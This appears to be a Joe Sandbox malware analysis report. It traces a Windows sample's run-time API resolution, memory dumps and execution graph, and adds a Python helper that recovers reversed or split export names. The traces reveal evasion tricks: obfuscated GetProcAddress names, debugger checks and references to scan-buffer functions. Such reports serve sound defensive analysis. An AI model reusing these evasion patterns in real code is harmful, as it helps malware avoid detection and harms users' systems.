                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc
                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                        • API String ID: 1883125708-1952140341
                                        • Opcode ID: f576597a69a09654f60ebb618e2f4820da52f17cc3a5c4ede3288082c318233d
                                        • Instruction ID: 4d2dfcae9eec958f4f2f688cc62a8457712905ebf9978b7de86140f5ecbd4198
                                        • Opcode Fuzzy Hash: f576597a69a09654f60ebb618e2f4820da52f17cc3a5c4ede3288082c318233d
                                        • Instruction Fuzzy Hash: C5F06231664304BFEB11EFA8DC8295E77BDE749740B5149E0F50493B20DE30BD10AA64
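                                        The String IDs of the three preceding function blocks (Kernel32$sserddAcorPteG, Ntdll$RtlM$oveM and AeldnaHeludoMteG$KernelBASE) are the export names the loader feeds to GetProcAddress, stored backwards ("sserddAcorPteG" is "GetProcAddress", "AeldnaHeludoMteG" is "GetModuleHandleA") or cut into fragments ("RtlM", "oveM") so that a plain strings listing does not show them. The helper below is an added example, not part of this Joe Sandbox report or of the analysed sample: it takes such a String ID field and recovers reversed and fragmented export names. The export allow-list and the trailing "hello" token are constructed for the demonstration; a real triage run would fill the allow-list from the export tables of kernel32, kernelbase and ntdll.

```python
"""Recover Win32 export names that a loader stores reversed or split.

Added example, not part of the sandbox report or the analysed sample.
The String IDs above pair GetProcAddress calls with "sserddAcorPteG"
("GetProcAddress" backwards), "AeldnaHeludoMteG" ("GetModuleHandleA"
backwards) and the fragments "RtlM" / "oveM". This module turns such a
strings list back into readable API names.
"""

# Constructed allow-list (assumption for this example) of exports a loader
# commonly resolves at run time. A real triage run would build it from the
# export tables of kernel32, kernelbase and ntdll instead of hard-coding it.
KNOWN_EXPORTS = frozenset({
    "GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
    "LoadLibraryA", "LoadLibraryW", "RtlMoveMemory", "VirtualAlloc",
    "VirtualProtect", "WriteProcessMemory", "CreateProcessW",
    "ResumeThread", "IsDebuggerPresent", "NtUnmapViewOfSection",
})

# Strings as the report lists them, joined with "$" the way Joe Sandbox
# prints its String ID field. "hello" is a constructed non-matching token.
REPORT_STRING_IDS = (
    "Kernel32$sserddAcorPteG$AeldnaHeludoMteG$KernelBASE$Ntdll$RtlM$oveM$hello"
)

MIN_PREFIX = 8  # shortest fragment join worth reporting as a partial match


def split_string_ids(field):
    """Split a Joe Sandbox 'String ID' field into its individual strings."""
    return [s for s in field.split("$") if s]


def find_reversed_apis(strings, known=KNOWN_EXPORTS):
    """Map each token whose reverse is a known export to that export name.

    Tokens that already are plain export names are ignored: only the
    obfuscated form is of interest here.
    """
    hits = {}
    for tok in strings:
        rev = tok[::-1]
        if rev in known and tok not in known:
            hits[tok] = rev
    return hits


def find_split_apis(strings, known=KNOWN_EXPORTS, min_prefix=MIN_PREFIX):
    """Join runs of two or more adjacent strings and match them against exports.

    Returns {joined_text: [candidate exports]}. A full match yields that one
    export; a join of at least `min_prefix` characters that is a prefix of
    one or more exports yields those exports as candidates. Extension of a
    run stops as soon as no export starts with the current join.
    """
    hits = {}
    for i in range(len(strings)):
        joined = strings[i]
        for j in range(i + 1, len(strings)):
            joined += strings[j]
            candidates = sorted(k for k in known if k.startswith(joined))
            if not candidates:
                break
            if joined in known:
                hits[joined] = [joined]
                break
            if len(joined) >= min_prefix:
                hits[joined] = candidates
    return hits


def recover_apis(field):
    """Run both recoveries over one 'String ID' field and merge the results."""
    strings = split_string_ids(field)
    out = {tok: [name] for tok, name in find_reversed_apis(strings).items()}
    out.update(find_split_apis(strings))
    return out


if __name__ == "__main__":
    for token, names in recover_apis(REPORT_STRING_IDS).items():
        print(f"{token!r:22} -> {', '.join(names)}")
```

The fragment matcher reports "RtlMoveM" only as a candidate for RtlMoveMemory, because the report shows just two of the pieces; the full name is confirmed by the RtlMoveMemory.NTDLL call logged in the same function, not by the strings alone. Treat prefix hits as leads to verify against the API trace, not as conclusions.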
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02B4EF98,UacInitialize,02B9137C,02B5AFD8,OpenSession,02B9137C,02B5AFD8,ScanBuffer,02B9137C,02B5AFD8,ScanString,02B9137C,02B5AFD8,Initialize), ref: 02B4EB9A
                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B4EBAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: IsDebuggerPresent$KernelBase
                                        • API String ID: 1646373207-2367923768
                                        • Opcode ID: 21bb1a2931f7a878eed3ccd4a1a88f9545ac7d41e8f884706987a3a1fc008098
                                        • Instruction ID: 793cd5d293903897675e8ac27624fb538e52337364cfc0f18b4aa6a952c83fc1
                                        • Opcode Fuzzy Hash: 21bb1a2931f7a878eed3ccd4a1a88f9545ac7d41e8f884706987a3a1fc008098
                                        • Instruction Fuzzy Hash: D4D012A2795B102EBA023AF40CC4C5E13CDAB0556A3201EF1F023D20E2EAAAC8126514
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B5C10B,00000000,02B5C11E), ref: 02B3C402
                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B3C413
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                        • API String ID: 1646373207-3712701948
                                        • Opcode ID: 9c04234980aa73848886520a3e0da82f36944737878674255a86bc96b90d42b1
                                        • Instruction ID: 76e19df2c1db5cdce905b25b7b718485ac3574a063d07ec87583f0210f506eff
                                        • Opcode Fuzzy Hash: 9c04234980aa73848886520a3e0da82f36944737878674255a86bc96b90d42b1
                                        • Instruction Fuzzy Hash: 54D05EA0A803125EE3035AF168807323AC897047A4B4469E6A001AA101C77584244F88
                                        APIs
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B3E21F
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B3E23B
                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B3E2B2
                                        • VariantClear.OLEAUT32(?), ref: 02B3E2DB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                        • String ID:
                                        • API String ID: 920484758-0
                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                        • Instruction ID: e46c25563e726ce573315ed21d053423b56d3b2b0e4dddc2ab81f73c2469ad48
                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                        • Instruction Fuzzy Hash: 2741D7B5A0161A9BCB62DB58CC90BD9B3BDFF49214F0042E6E649E7251DA30EF848F50
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                        • String ID:
                                        • API String ID: 3990497365-0
                                        • Opcode ID: ea429f9c7e13ff1e4cad40957eab5680915dc78e312ff9595073bf97ccaadbe4
                                        • Instruction ID: 902e1776d75b7417f4da616ca219c1ff5d9930df95d0fb684b1972cf5755f643
                                        • Opcode Fuzzy Hash: ea429f9c7e13ff1e4cad40957eab5680915dc78e312ff9595073bf97ccaadbe4
                                        • Instruction Fuzzy Hash: D3415E71A40258ABDB22EF68CD84BDEB7FDAB18341F1044E5A648E7241DB749F84CF50
                                        APIs
                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                        • String ID:
                                        • API String ID: 3990497365-0
                                        • Opcode ID: 356ba370ff3003e8070c62a4b557fbaf0a480e4f0b30205efb95c7c3884491d4
                                        • Instruction ID: f3f9c25368c7a726692c302b7792ab0c5fbb65730a00338338b6b2a0aea3478b
                                        • Opcode Fuzzy Hash: 356ba370ff3003e8070c62a4b557fbaf0a480e4f0b30205efb95c7c3884491d4
                                        • Instruction Fuzzy Hash: 37417E71A40258AFDB22EB68CD80BDAB7FDAB18341F1004E5A648E7241DB749F88CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f790ce3378fdd357947ca7adb00c0bb585eae73905edb00ef1c1fa634e8ecbc9
                                        • Instruction ID: ac45da1217b1158871f6d30d23fba14d951a93393ee92ccf54ad5a6ec0843f84
                                        • Opcode Fuzzy Hash: f790ce3378fdd357947ca7adb00c0bb585eae73905edb00ef1c1fa634e8ecbc9
                                        • Instruction Fuzzy Hash: F8A1E6B67306100BE71AAA7C9C843ADB3CADBC5365F1C82BEE11DCB381DB64C9568650
                                        APIs
                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B39562), ref: 02B394FA
                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B39562), ref: 02B39500
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DateFormatLocaleThread
                                        • String ID: yyyy
                                        • API String ID: 3303714858-3145165042
                                        • Opcode ID: bb6991610b6d66dc8d4746e99c208fdbc1972fba51690846107cc9c15237df5f
                                        • Instruction ID: 68f6054f401a1b31665db337340fc6ab560e9ec4c5ce3656ac92bf79352a6a61
                                        • Opcode Fuzzy Hash: bb6991610b6d66dc8d4746e99c208fdbc1972fba51690846107cc9c15237df5f
                                        • Instruction Fuzzy Hash: D1217C76A00618AFDB12DFA8C881AEEB3B9EF48710F4240E5F905E7251D774DE44CBA5
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B48216), ref: 02B481F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                        • String ID: FlushInstructionCache$Kernel32
                                        • API String ID: 3811539418-184458249
                                        • Opcode ID: c9e1e5f67e49dbc3935d446bbcab483fbdd225fcc65cb72d0c7bda2a820a6baa
                                        • Instruction ID: 7221b52aa8ea4171a7175cbb59b9ff158040cd8c29b4e46a1a26e02a74b17097
                                        • Opcode Fuzzy Hash: c9e1e5f67e49dbc3935d446bbcab483fbdd225fcc65cb72d0c7bda2a820a6baa
                                        • Instruction Fuzzy Hash: 43016D75654304BFEB12EFA8DC81F5E77BDE748B50F6184A0F904E7640DA74AD10AB24
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AD98
                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B4ADC8
                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B4ADE7
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4ADF3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                         • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmp
                                         • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Read$Write
                                        • String ID:
                                        • API String ID: 3448952669-0
                                        • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                        • Instruction ID: 054beccc49b2794c13e9dd087c832d45c1f701d4c9c8ab23214468ca46e7e676
                                        • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                        • Instruction Fuzzy Hash: 0821B4B5A80619ABDF10DF69CCC0BAE77B9EF44352F004191EE1097344EF34D911EAA4

                                        Execution Graph

                                         Execution Coverage: 1.4%
                                         Dynamic/Decrypted Code Coverage: 98.3%
                                         Signature Coverage: 5%
                                         Total number of Nodes: 974
                                         Total number of Limit Nodes: 44
                                         execution_graph (raw node and edge data for the rendered call graph omitted)
93634->93641 93635->93624 93638->93629 93639->93631 93640->93631 93643 4a820c7 93642->93643 93644 4a823ae 11 API calls 93643->93644 93645 4a820d2 93644->93645 93645->93236 93646->93236 93647->93236 93648->93231 93649->93242 93650->93246 93651->93250 93652->93252 93655 4a8328a 93654->93655 93657 4a832a9 93655->93657 93658 4a828c8 28 API calls 93655->93658 93657->93262 93658->93657 93660 4a851db 93659->93660 93669 4a85254 93660->93669 93662 4a851e8 93662->93265 93664 4a82041 93663->93664 93665 4a823ae 11 API calls 93664->93665 93666 4a8205b 93665->93666 93674 4a8265a 93666->93674 93670 4a85262 93669->93670 93673 4a82884 22 API calls 93670->93673 93675 4a8266b 93674->93675 93676 4a823ae 11 API calls 93675->93676 93677 4a8206d 93676->93677 93677->93268 93678->93269 93679->93282 93681 4a992bc 93680->93681 93682 4a99f30 GetCurrentProcess 93680->93682 93683 4a91f91 RegOpenKeyExA 93681->93683 93682->93681 93684 4a91fbf RegQueryValueExA RegCloseKey 93683->93684 93685 4a91fe9 93683->93685 93684->93685 93686 4a82073 28 API calls 93685->93686 93687 4a91ffe 93686->93687 93687->93289 93688->93297 93690 4a824d9 93689->93690 93691 4a824ea 28 API calls 93690->93691 93692 4a82091 93691->93692 93692->93044 93709 4ab97c5 93693->93709 93695 4ab8c0b 93715 4ab8557 35 API calls 2 library calls 93695->93715 93696 4ab8bd0 93696->93695 93697 4ab8be5 93696->93697 93708 4ab8bea pre_c_initialization 93696->93708 93714 4abad91 20 API calls __dosmaperr 93697->93714 93701 4ab8c17 93702 4ab8c46 93701->93702 93716 4ab980a 39 API calls __Tolower 93701->93716 93705 4ab8cb2 93702->93705 93717 4ab9771 20 API calls 2 library calls 93702->93717 93718 4ab9771 20 API calls 2 library calls 93705->93718 93706 4ab8d79 _strftime 93706->93708 93719 4abad91 20 API calls __dosmaperr 93706->93719 93708->93326 93710 4ab97ca 93709->93710 93711 4ab97dd 93709->93711 93720 4abad91 20 API calls __dosmaperr 93710->93720 93711->93696 93713 4ab97cf pre_c_initialization 93713->93696 93714->93708 93715->93701 93716->93701 
93717->93705 93718->93706 93719->93708 93720->93713 93727 4a81f90 93721->93727 93723 4a82efe 93724 4a82035 11 API calls 93723->93724 93725 4a82f0d 93724->93725 93725->93340 93726->93343 93730 4a825d0 93727->93730 93729 4a81f9d 93729->93723 93731 4a82868 22 API calls 93730->93731 93732 4a825e2 93731->93732 93733 4a82609 93732->93733 93734 4a82652 93732->93734 93738 4a8261b 93733->93738 93739 4a828c8 28 API calls 93733->93739 93740 4a82884 22 API calls 93734->93740 93738->93729 93739->93738 93742 4a81f6e 93741->93742 93755 4a82232 93742->93755 93744 4a81f79 93744->93353 93745->93371 93760 4a83202 93746->93760 93748 4a83002 93764 4a83242 93748->93764 93751->93383 93752->93387 93788 4a892fb 157 API calls 93752->93788 93753->93376 93754->93375 93789 4a892ef 82 API calls 93754->93789 93790 4a89311 48 API calls 93754->93790 93791 4a89305 122 API calls 93754->93791 93756 4a8228c 93755->93756 93757 4a8223c 93755->93757 93756->93744 93757->93756 93759 4a82759 11 API calls std::_Deallocate 93757->93759 93759->93756 93761 4a8320e 93760->93761 93770 4a835f8 93761->93770 93763 4a8321b 93763->93748 93765 4a8324e 93764->93765 93766 4a82232 11 API calls 93765->93766 93767 4a83268 93766->93767 93784 4a82316 93767->93784 93771 4a83606 93770->93771 93772 4a8360c 93771->93772 93773 4a83624 93771->93773 93781 4a83686 28 API calls 93772->93781 93775 4a8363c 93773->93775 93776 4a8367e 93773->93776 93780 4a83622 93775->93780 93782 4a827c6 28 API calls 93775->93782 93783 4a82884 22 API calls 93776->93783 93780->93763 93781->93780 93782->93780 93785 4a82327 93784->93785 93786 4a82232 11 API calls 93785->93786 93787 4a823a7 93786->93787 93787->93381 93793 4a84166 93792->93793 93794 4a82232 11 API calls 93793->93794 93795 4a84171 93794->93795 93803 4a8419c 93795->93803 93798 4a842dc 93816 4a84333 93798->93816 93800 4a842ea 93801 4a83242 11 API calls 93800->93801 93802 4a842f9 93801->93802 93802->93394 93804 4a841a8 93803->93804 93807 4a841b9 93804->93807 93806 4a8417c 93806->93798 93808 
4a841c9 93807->93808 93809 4a841cf 93808->93809 93810 4a841e6 93808->93810 93814 4a84247 28 API calls 93809->93814 93815 4a827c6 28 API calls 93810->93815 93813 4a841e4 93813->93806 93814->93813 93815->93813 93817 4a8433f 93816->93817 93820 4a84351 93817->93820 93819 4a8434d 93819->93800 93821 4a8435f 93820->93821 93822 4a8437e 93821->93822 93823 4a84365 93821->93823 93824 4a82868 22 API calls 93822->93824 93886 4a834c6 28 API calls 93823->93886 93825 4a84386 93824->93825 93827 4a843f9 93825->93827 93828 4a8439f 93825->93828 93888 4a82884 22 API calls 93827->93888 93839 4a8437c 93828->93839 93887 4a827c6 28 API calls 93828->93887 93839->93819 93886->93839 93887->93839 93889->93401 93894 4a998da _Yarn ___scrt_get_show_window_mode 93891->93894 93892 4a82073 28 API calls 93893 4a9399f 93892->93893 93893->93419 93894->93892 93895->93436 93897 4a93958 getaddrinfo WSASetLastError 93896->93897 93898 4a9394e 93896->93898 93897->93479 94012 4a937dc 29 API calls ___std_exception_copy 93898->94012 93900 4a93953 93900->93897 93902 4a84819 93901->93902 93903 4a84826 socket 93901->93903 94013 4a8487e WSAStartup 93902->94013 93905 4a84840 CreateEventW 93903->93905 93906 4a84822 93903->93906 93905->93479 93906->93479 93907 4a8481e 93907->93903 93907->93906 93909 4a84fca 93908->93909 93910 4a84f45 93908->93910 93909->93479 93911 4a84f4e 93910->93911 93912 4a84fa0 CreateEventA CreateThread 93910->93912 93913 4a84f5d GetLocalTime 93910->93913 93911->93912 93912->93909 94015 4a85130 93912->94015 94014 4a99b16 28 API calls 93913->94014 93915 4a84f71 93916 4a852dd 28 API calls 93915->93916 93917 4a84f81 93916->93917 93918 4a82073 28 API calls 93917->93918 93919 4a84f90 93918->93919 93920 4a994da 77 API calls 93919->93920 93921 4a84f95 93920->93921 93922 4a81fb8 11 API calls 93921->93922 93922->93912 93924 4a849fb 93923->93924 93925 4a848ce 93923->93925 93926 4a84a01 WSAGetLastError 93924->93926 93927 4a8495e 93924->93927 93925->93927 93928 4a84903 93925->93928 93930 4a852fe 28 API calls 
93925->93930 93926->93927 93929 4a84a11 93926->93929 93927->93479 94019 4a9ea15 27 API calls 93928->94019 93931 4a84912 93929->93931 93932 4a84a16 93929->93932 93934 4a848ef 93930->93934 93937 4a82073 28 API calls 93931->93937 94030 4a9a86b 30 API calls 93932->94030 93938 4a82073 28 API calls 93934->93938 93936 4a8490b 93936->93931 93940 4a84921 93936->93940 93941 4a84a60 93937->93941 93942 4a848fe 93938->93942 93939 4a84a20 93943 4a852dd 28 API calls 93939->93943 93949 4a84930 93940->93949 93950 4a84967 93940->93950 93944 4a82073 28 API calls 93941->93944 93945 4a994da 77 API calls 93942->93945 93946 4a84a30 93943->93946 93947 4a84a6f 93944->93947 93945->93928 93948 4a82073 28 API calls 93946->93948 93951 4a994da 77 API calls 93947->93951 93952 4a84a3f 93948->93952 93954 4a82073 28 API calls 93949->93954 94027 4a9f7f5 53 API calls 93950->94027 93951->93927 93956 4a994da 77 API calls 93952->93956 93955 4a8493f 93954->93955 93958 4a82073 28 API calls 93955->93958 93959 4a84a44 93956->93959 93957 4a8496f 93960 4a849a4 93957->93960 93961 4a84974 93957->93961 93962 4a8494e 93958->93962 93964 4a81fb8 11 API calls 93959->93964 94029 4a9ebbb 28 API calls 93960->94029 93965 4a82073 28 API calls 93961->93965 93966 4a994da 77 API calls 